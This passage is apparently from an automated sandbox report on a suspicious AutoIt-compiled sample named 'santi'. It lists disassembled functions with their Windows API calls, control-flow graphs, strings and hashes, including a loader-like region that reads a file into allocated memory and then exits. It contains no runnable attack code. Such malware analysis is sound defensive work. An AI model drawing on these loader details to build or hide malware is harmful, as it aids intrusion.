                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                • API String ID: 2914291525-1005189915
                                                                • Opcode ID: 04c406522037df001ea76c57c79e40a820c4948a9b6c11c1edb3f1320618509e
                                                                • Instruction ID: 6ac8c32a119a483493bcce47a3c3cb4d324e46221a52cd6ce965b01ebdeccc6e
                                                                • Opcode Fuzzy Hash: 04c406522037df001ea76c57c79e40a820c4948a9b6c11c1edb3f1320618509e
                                                                • Instruction Fuzzy Hash: 082198B5E00219AFDB02DFA5EC49BCEBBB8FB09704F04821AF915A62A0D7B545448F91
                                                                Function 0032BFA4 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 0032BDB4: __time64.LIBCMT ref: 0032BDBE
                                                                  • Part of subcall function 002E4517: _fseek.LIBCMT ref: 002E452F
                                                                • __wsplitpath.LIBCMT ref: 0032C083
                                                                  • Part of subcall function 00301DFC: __wsplitpath_helper.LIBCMT ref: 00301E3C
                                                                • _wcscpy.LIBCMT ref: 0032C096
                                                                • _wcscat.LIBCMT ref: 0032C0A9
                                                                • __wsplitpath.LIBCMT ref: 0032C0CE
                                                                • _wcscat.LIBCMT ref: 0032C0E4
                                                                • _wcscat.LIBCMT ref: 0032C0F7
                                                                • _wcscmp.LIBCMT ref: 0032C03E
                                                                  • Part of subcall function 0032C56D: _wcscmp.LIBCMT ref: 0032C65D
                                                                  • Part of subcall function 0032C56D: _wcscmp.LIBCMT ref: 0032C670
                                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0032C2A1
                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0032C338
                                                                • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0032C34E
                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0032C35F
                                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0032C371
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                • String ID:
                                                                • API String ID: 2378138488-0
                                                                • Opcode ID: 33598aa40b2efd8925646eacbd9998c5f5b75f3bb6fc35a964959448129c7984
                                                                • Instruction ID: acd284db1f3c82f7eebd08e69a86d575d780b01c62d9e158e2a62177ee6b7268
                                                                • Opcode Fuzzy Hash: 33598aa40b2efd8925646eacbd9998c5f5b75f3bb6fc35a964959448129c7984
                                                                • Instruction Fuzzy Hash: C0C12DB1E10229AFDF12DF95DC81EDEB7BDAF49300F1040AAF609EA151DB709A448F61
                                                                Function 002E3742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 957 2e3742-2e3762 959 2e3764-2e3767 957->959 960 2e37c2-2e37c4 957->960 962 2e37c8 959->962 963 2e3769-2e3770 959->963 960->959 961 2e37c6 960->961 964 2e37ab-2e37b3 DefWindowProcW 961->964 965 2e37ce-2e37d1 962->965 966 351e00-351e2e call 2e2ff6 call 2fe312 962->966 967 2e382c-2e3834 PostQuitMessage 963->967 968 2e3776-2e377b 963->968 975 2e37b9-2e37bf 964->975 969 2e37f6-2e381d SetTimer RegisterWindowMessageW 965->969 970 2e37d3-2e37d4 965->970 1004 351e33-351e3a 966->1004 974 2e37f2-2e37f4 967->974 972 351e88-351e9c call 324ddd 968->972 973 2e3781-2e3783 968->973 969->974 979 2e381f-2e382a CreatePopupMenu 969->979 976 2e37da-2e37ed KillTimer call 2e3847 call 2e390f 970->976 977 351da3-351da6 970->977 972->974 998 351ea2 972->998 980 2e3789-2e378e 973->980 981 2e3836-2e3840 call 2feb83 973->981 974->975 976->974 983 351ddc-351dfb MoveWindow 977->983 984 351da8-351daa 977->984 979->974 987 351e6d-351e74 980->987 988 2e3794-2e3799 980->988 999 2e3845 981->999 983->974 991 351dac-351daf 984->991 992 351dcb-351dd7 SetFocus 984->992 987->964 994 351e7a-351e83 call 31a5f3 987->994 996 2e379f-2e37a5 988->996 997 351e58-351e68 call 3255bd 988->997 991->996 1000 351db5-351dc6 call 2e2ff6 991->1000 992->974 994->964 996->964 996->1004 997->974 998->964 999->974 1000->974 1004->964 1008 351e40-351e53 call 2e3847 call 2e4ffc 1004->1008 1008->964
                                                                APIs
                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 002E37B3
                                                                • KillTimer.USER32(?,00000001), ref: 002E37DD
                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002E3800
                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002E380B
                                                                • CreatePopupMenu.USER32 ref: 002E381F
                                                                • PostQuitMessage.USER32(00000000), ref: 002E382E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                • String ID: TaskbarCreated
                                                                • API String ID: 129472671-2362178303
                                                                • Opcode ID: ea801064689636b243fe492c3776fdf313136de3204b96e5a8a0b2f532c82837
                                                                • Instruction ID: 01436a01b84685b57e2442ea1d7ff96ff74089c35e4bb19985f3ee78a952136a
                                                                • Opcode Fuzzy Hash: ea801064689636b243fe492c3776fdf313136de3204b96e5a8a0b2f532c82837
                                                                • Instruction Fuzzy Hash: 5D4169F52B41D6ABDB12DF2ADC4EF7A7A99FB01303F800114F902D30A1CBA09E608761
                                                                Function 002E3E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • GetSysColorBrush.USER32(0000000F), ref: 002E3E79
                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 002E3E88
                                                                • LoadIconW.USER32(00000063), ref: 002E3E9E
                                                                • LoadIconW.USER32(000000A4), ref: 002E3EB0
                                                                • LoadIconW.USER32(000000A2), ref: 002E3EC2
                                                                  • Part of subcall function 002E4024: LoadImageW.USER32(002E0000,00000063,00000001,00000010,00000010,00000000), ref: 002E4048
                                                                • RegisterClassExW.USER32(?), ref: 002E3F30
                                                                  • Part of subcall function 002E3F53: GetSysColorBrush.USER32(0000000F), ref: 002E3F86
                                                                  • Part of subcall function 002E3F53: RegisterClassExW.USER32(00000030), ref: 002E3FB0
                                                                  • Part of subcall function 002E3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002E3FC1
                                                                  • Part of subcall function 002E3F53: InitCommonControlsEx.COMCTL32(?), ref: 002E3FDE
                                                                  • Part of subcall function 002E3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002E3FEE
                                                                  • Part of subcall function 002E3F53: LoadIconW.USER32(000000A9), ref: 002E4004
                                                                  • Part of subcall function 002E3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002E4013
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                • String ID: #$0$AutoIt v3
                                                                • API String ID: 423443420-4155596026
                                                                • Opcode ID: 3b2108d440e26e3f211fe4188a09e159b0992656303dae80cdb3c651ac727916
                                                                • Instruction ID: 0158b719cd85fed6ec40cf2d895148de0a9d06fc298d97b55e178838ab6142f0
                                                                • Opcode Fuzzy Hash: 3b2108d440e26e3f211fe4188a09e159b0992656303dae80cdb3c651ac727916
                                                                • Instruction Fuzzy Hash: 642177B4E44314AFCB42DFA9EC45A9ABFF9FB49314F00411AE604A32A0D7754540CF91
                                                                Function 0030ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1021 30acb3-30ace0 call 306ac0 call 307cf4 call 306986 1028 30ace2-30acf8 call 30e880 1021->1028 1029 30acfd-30ad02 1021->1029 1035 30af52-30af57 call 306b05 1028->1035 1031 30ad08-30ad0f 1029->1031 1033 30ad11-30ad40 1031->1033 1034 30ad42-30ad51 GetStartupInfoW 1031->1034 1033->1031 1036 30ae80-30ae86 1034->1036 1037 30ad57-30ad5c 1034->1037 1039 30af44-30af50 call 30af58 1036->1039 1040 30ae8c-30ae9d 1036->1040 1037->1036 1038 30ad62-30ad79 1037->1038 1042 30ad80-30ad83 1038->1042 1043 30ad7b-30ad7d 1038->1043 1039->1035 1044 30aeb2-30aeb8 1040->1044 1045 30ae9f-30aea2 1040->1045 1048 30ad86-30ad8c 1042->1048 1043->1042 1050 30aeba-30aebd 1044->1050 1051 30aebf-30aec6 1044->1051 1045->1044 1049 30aea4-30aead 1045->1049 1053 30adae-30adb6 1048->1053 1054 30ad8e-30ad9f call 306986 1048->1054 1055 30af3e-30af3f 1049->1055 1056 30aec9-30aed5 GetStdHandle 1050->1056 1051->1056 1058 30adb9-30adbb 1053->1058 1066 30ae33-30ae3a 1054->1066 1067 30ada5-30adab 1054->1067 1055->1036 1059 30aed7-30aed9 1056->1059 1060 30af1c-30af32 1056->1060 1058->1036 1063 30adc1-30adc6 1058->1063 1059->1060 1064 30aedb-30aee4 GetFileType 1059->1064 1060->1055 1062 30af34-30af37 1060->1062 1062->1055 1068 30ae20-30ae31 1063->1068 1069 30adc8-30adcb 1063->1069 1064->1060 1065 30aee6-30aef0 1064->1065 1070 30aef2-30aef8 1065->1070 1071 30aefa-30aefd 1065->1071 1072 30ae40-30ae4e 1066->1072 1067->1053 1068->1058 1069->1068 1073 30adcd-30add1 1069->1073 1074 30af05 1070->1074 1075 30af08-30af1a InitializeCriticalSectionAndSpinCount 1071->1075 1076 30aeff-30af03 1071->1076 1077 30ae50-30ae72 1072->1077 1078 30ae74-30ae7b 1072->1078 1073->1068 1079 30add3-30add5 1073->1079 1074->1075 1075->1055 1076->1074 1077->1072 1078->1048 1080 30ade5-30ae1a InitializeCriticalSectionAndSpinCount 1079->1080 1081 30add7-30ade3 GetFileType 1079->1081 1082 30ae1d 1080->1082 1081->1080 1081->1082 1082->1068
                                                                APIs
                                                                • __lock.LIBCMT ref: 0030ACC1
                                                                  • Part of subcall function 00307CF4: __mtinitlocknum.LIBCMT ref: 00307D06
                                                                  • Part of subcall function 00307CF4: EnterCriticalSection.KERNEL32(00000000,?,00307ADD,0000000D), ref: 00307D1F
                                                                • __calloc_crt.LIBCMT ref: 0030ACD2
                                                                  • Part of subcall function 00306986: __calloc_impl.LIBCMT ref: 00306995
                                                                  • Part of subcall function 00306986: Sleep.KERNEL32(00000000,000003BC,002FF507,?,0000000E), ref: 003069AC
                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0030ACED
                                                                • GetStartupInfoW.KERNEL32(?,00396E28,00000064,00305E91,00396C70,00000014), ref: 0030AD46
                                                                • __calloc_crt.LIBCMT ref: 0030AD91
                                                                • GetFileType.KERNEL32(00000001), ref: 0030ADD8
                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0030AE11
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                • String ID:
                                                                • API String ID: 1426640281-0
                                                                • Opcode ID: ffca43fd220f4f27c02a4a8304c4007c45e9e819af2f1b1e31abcda3b578b912
                                                                • Instruction ID: 2e691e651943e6e9740bde9c191262bc99e27e734b6e1fefcbd6c717366a835a
                                                                • Opcode Fuzzy Hash: ffca43fd220f4f27c02a4a8304c4007c45e9e819af2f1b1e31abcda3b578b912
                                                                • Instruction Fuzzy Hash: 6281F571D06B458FDB16CF68E8605AEBBF4AF4A320F24425DD4A6AB3D1C7349803CB56
                                                                Function 00E17580 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 239fileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1083 e17580-e1762e call e14f70 1086 e17635-e1765b call e18490 CreateFileW 1083->1086 1089 e17662-e17672 1086->1089 1090 e1765d 1086->1090 1095 e17674 1089->1095 1096 e17679-e17693 VirtualAlloc 1089->1096 1091 e177ad-e177b1 1090->1091 1093 e177f3-e177f6 1091->1093 1094 e177b3-e177b7 1091->1094 1097 e177f9-e17800 1093->1097 1098 e177c3-e177c7 1094->1098 1099 e177b9-e177bc 1094->1099 1095->1091 1102 e17695 1096->1102 1103 e1769a-e176b1 ReadFile 1096->1103 1104 e17802-e1780d 1097->1104 1105 e17855-e1786a 1097->1105 1100 e177d7-e177db 1098->1100 1101 e177c9-e177d3 1098->1101 1099->1098 1108 e177eb 1100->1108 1109 e177dd-e177e7 1100->1109 1101->1100 1102->1091 1110 e176b3 1103->1110 1111 e176b8-e176f8 VirtualAlloc 1103->1111 1112 e17811-e1781d 1104->1112 1113 e1780f 1104->1113 1106 e1787a-e17882 1105->1106 1107 e1786c-e17877 VirtualFree 1105->1107 1107->1106 1108->1093 1109->1108 1110->1091 1114 e176fa 1111->1114 1115 e176ff-e1771a call e186e0 1111->1115 1116 e17831-e1783d 1112->1116 1117 e1781f-e1782f 1112->1117 1113->1105 1114->1091 1123 e17725-e1772f 1115->1123 1120 e1784a-e17850 1116->1120 1121 e1783f-e17848 1116->1121 1119 e17853 1117->1119 1119->1097 1120->1119 1121->1119 1124 e17731-e17760 call e186e0 1123->1124 1125 e17762-e17776 call e184f0 1123->1125 1124->1123 1131 e17778 1125->1131 1132 e1777a-e1777e 1125->1132 1131->1091 1133 e17780-e17784 CloseHandle 1132->1133 1134 e1778a-e1778e 1132->1134 1133->1134 1135 e17790-e1779b VirtualFree 1134->1135 1136 e1779e-e177a7 1134->1136 1135->1136 1136->1086 1136->1091
                                                                APIs
                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E17651
                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E17877
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293967050.0000000000E14000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E14000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e14000_santi.jbxd
                                                                Similarity
                                                                • API ID: CreateFileFreeVirtual
                                                                • String ID: k~
                                                                • API String ID: 204039940-3608382517
                                                                • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                • Instruction ID: 659f8d143e24182c460e5a387bda700ff747361fbd711b195a6f6939de89829c
                                                                • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                • Instruction Fuzzy Hash: 37A14674E04209EBDB14CFA4C898BEEBBB5FF48705F209159E151BB280D7759A80CFA4
                                                                Function 002E49FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1192 2e49fb-2e4a25 call 2ebcce RegOpenKeyExW 1195 2e4a2b-2e4a2f 1192->1195 1196 3541cc-3541e3 RegQueryValueExW 1192->1196 1197 3541e5-354222 call 2ff4ea call 2e47b7 RegQueryValueExW 1196->1197 1198 354246-35424f RegCloseKey 1196->1198 1203 354224-35423b call 2e6a63 1197->1203 1204 35423d-354245 call 2e47e2 1197->1204 1203->1204 1204->1198
                                                                APIs
                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 002E4A1D
                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003541DB
                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0035421A
                                                                • RegCloseKey.ADVAPI32(?), ref: 00354249
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: QueryValue$CloseOpen
                                                                • String ID: Include$Software\AutoIt v3\AutoIt
                                                                • API String ID: 1586453840-614718249
                                                                • Opcode ID: 652b5c5b52b244f6f5a8dac02bcb2ee7f77a0533125df4da268135ec6f80a09b
                                                                • Instruction ID: a07900e5e91a8fb1a6dd31bfded395d144445e2eafa762bf0bdf8c4f2bda848e
                                                                • Opcode Fuzzy Hash: 652b5c5b52b244f6f5a8dac02bcb2ee7f77a0533125df4da268135ec6f80a09b
                                                                • Instruction Fuzzy Hash: 8C11AF71A50109BFEB06ABA4CD86DFF7BBCEF04344F004068F506D21A1EAB09E41DB50
                                                                Function 002E36B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1219 2e36b8-2e3728 CreateWindowExW * 2 ShowWindow * 2
                                                                APIs
                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002E36E6
                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 002E3707
                                                                • ShowWindow.USER32(00000000,?,?,?,?,002E3AA3,?), ref: 002E371B
                                                                • ShowWindow.USER32(00000000,?,?,?,?,002E3AA3,?), ref: 002E3724
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$CreateShow
                                                                • String ID: AutoIt v3$edit
                                                                • API String ID: 1584632944-3779509399
                                                                • Opcode ID: ba050a2e33d3be39c1e98e99dc106ee27d5abcef354cd3bd7bd2c6576bd1df36
                                                                • Instruction ID: 48953dbdcd696052da821d50c322711f956e3b78de47a1d0b4fb5f244dcd61be
                                                                • Opcode Fuzzy Hash: ba050a2e33d3be39c1e98e99dc106ee27d5abcef354cd3bd7bd2c6576bd1df36
                                                                • Instruction Fuzzy Hash: 3DF0FE75A402E07AE7729B57AC08E773E7DE7C7F24F00401FFA08A21B0C5650895DAB1
                                                                Function 00E17320 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156fileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1324 e17320-e1747f call e14f70 call e17210 CreateFileW 1331 e17481 1324->1331 1332 e17486-e17496 1324->1332 1333 e17536-e1753b 1331->1333 1335 e17498 1332->1335 1336 e1749d-e174b7 VirtualAlloc 1332->1336 1335->1333 1337 e174b9 1336->1337 1338 e174bb-e174d2 ReadFile 1336->1338 1337->1333 1339 e174d4 1338->1339 1340 e174d6-e17510 call e17250 call e16210 1338->1340 1339->1333 1345 e17512-e17527 call e172a0 1340->1345 1346 e1752c-e17534 ExitProcess 1340->1346 1345->1346 1346->1333
                                                                APIs
                                                                  • Part of subcall function 00E17210: Sleep.KERNELBASE(000001F4), ref: 00E17221
                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E17475
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293967050.0000000000E14000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E14000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e14000_santi.jbxd
                                                                Similarity
                                                                • API ID: CreateFileSleep
                                                                • String ID: WBBCQJX6QCW3J16M7PZT
                                                                • API String ID: 2694422964-2256965403
                                                                • Opcode ID: 2aac2944cbe036dbcb6e09ef5eae9c7d82e835dbea803b51e492353748faf780
                                                                • Instruction ID: d839e7bd0c6abb065c554d6d1eb2eb94894e2d43a0b5922048bd8e7688839d7a
                                                                • Opcode Fuzzy Hash: 2aac2944cbe036dbcb6e09ef5eae9c7d82e835dbea803b51e492353748faf780
                                                                • Instruction Fuzzy Hash: 6A619170E18248DBEF11DBA4C854BDEBBB5AF18704F005199E648BB2C1D7BA0B45CBA5
                                                                Function 002E4A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002E5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,003A1148,?,002E61FF,?,00000000,00000001,00000000), ref: 002E5392
                                                                  • Part of subcall function 002E49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 002E4A1D
                                                                • _wcscat.LIBCMT ref: 00352D80
                                                                • _wcscat.LIBCMT ref: 00352DB5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _wcscat$FileModuleNameOpen
                                                                • String ID: 8!:$\$\Include\
                                                                • API String ID: 3592542968-1415739923
                                                                • Opcode ID: d92288e7d57b7b992cf7db20ae3f4321b1ed9e18169cb9203a41bcf701322d69
                                                                • Instruction ID: f59160a691c920a703a88f9dd0d8985f9f791a8ad25885c7a21b880fbac1aa54
                                                                • Opcode Fuzzy Hash: d92288e7d57b7b992cf7db20ae3f4321b1ed9e18169cb9203a41bcf701322d69
                                                                • Instruction Fuzzy Hash: 595150764143809FC716EF5AD99189BB7F8FF5A300F90452EF64987261EB709908CF52
                                                                Function 002E4139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002E41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,002E39FE,?,00000001), ref: 002E41DB
                                                                • _free.LIBCMT ref: 003536B7
                                                                • _free.LIBCMT ref: 003536FE
                                                                  • Part of subcall function 002EC833: __wsplitpath.LIBCMT ref: 002EC93E
                                                                  • Part of subcall function 002EC833: _wcscpy.LIBCMT ref: 002EC953
                                                                  • Part of subcall function 002EC833: _wcscat.LIBCMT ref: 002EC968
                                                                  • Part of subcall function 002EC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 002EC978
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                • API String ID: 805182592-1757145024
                                                                • Opcode ID: 45a1a0627f91905922ecbe299109358ad18d19219afc98061c5ea979906bf15a
                                                                • Instruction ID: 767111f1027613698f64527f46b00d23c694b9ef3c930f7b24959d9ca02ed978
                                                                • Opcode Fuzzy Hash: 45a1a0627f91905922ecbe299109358ad18d19219afc98061c5ea979906bf15a
